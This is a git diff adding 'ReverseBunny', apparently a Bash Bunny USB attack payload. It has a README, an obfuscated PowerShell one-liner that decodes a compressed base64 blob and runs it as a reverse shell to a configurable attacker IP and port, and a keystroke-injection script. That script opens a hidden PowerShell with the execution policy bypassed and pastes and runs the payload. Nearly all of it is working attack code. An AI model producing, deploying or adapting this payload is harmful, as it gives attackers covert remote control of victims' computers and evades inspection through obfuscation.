diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md new file mode 100644 index 00000000..7f478362 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -0,0 +1,12 @@ +Title: ReverseBunny + +Author: 0iphor13 + +Version: 1.0 + + +Getting remote access via obfuscated reverse shell. +ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. + +# Red.............Payload running +# Green .............Finished diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt new file mode 100644 index 00000000..1aa4f158 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt @@ -0,0 +1 @@ +$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( 'PZJhb+IwDIb/Sj70lkSDiHHiPgzdpLbrpmq7DtFIpxNCcqHW6CgF0Uys6vLfzwlsH9pGdvy+fuwGfVxDCkljLPvNlOAZnvg1H76s6P2Ga8Mly7vW4E5laFS+X2/RtErHs7iusDEi6FM42EHQz2A/N1ZOgz7XMMfwjxMMSD4FumfVI5rcHLHYCTldrDqDi+Uy6KNOA7bu6kipX5PJz8nnleA/uOxHdnraVDUKZ3HWag0JAymrORYlxVcdaMztgI0GlF5BZ5LcqmdsXs1GSjZskI1kTy2VIejQiQhSzwgNT4T45g4ecai7A2bFDr9gNX4YFeZxmibNel9Wzau8ENDROcM/A87aO6dnbszgPoIw3nonGmaF5PBB+t8djO+ubtgnoy5e3s2Qsjk9XpRueRFIICshKuLt2LIzNkW+dK8Zn+WM09fpH6j4VHIp1awwG5e8Y3x6qYAIOo2+lYVxOHghWd7eejJPFNEmWnEuKZ0JPI09TUtbTPyw/x4rg8K1htk9gevEYTteyIBqaOrfQ/frP0IS7qx6qN/bjZCWYvEzVPQbaKviet+ikP8B' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'') \ No newline at end of file diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt new file mode 100644 index 00000000..7f45b871 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -0,0 +1,30 @@ +# Title: ReverseBunny +# Description: Obfuscated reverse shell, executed via powershell +# Author: 0iphor13 +# Version: 1.0 +# Category: Execution +# Attackmodes: HID, Storage + +GET SWITCH_POSITION +ATTACKMODE HID STORAGE +DUCKY_LANG de + +#LED RED - DON'T EJECT - PAYLOAD RUNNING + +LED R FAST + +DELAY 5000 +RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" +DELAY 2000 + +Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))" +DELAY 5000 +Q ENTER +DELAY 5000 +Q CONTROL v +DELAY 5000 +Q ENTER + +LED FINISH + +#SAVE TO EJECT \ No newline at end of file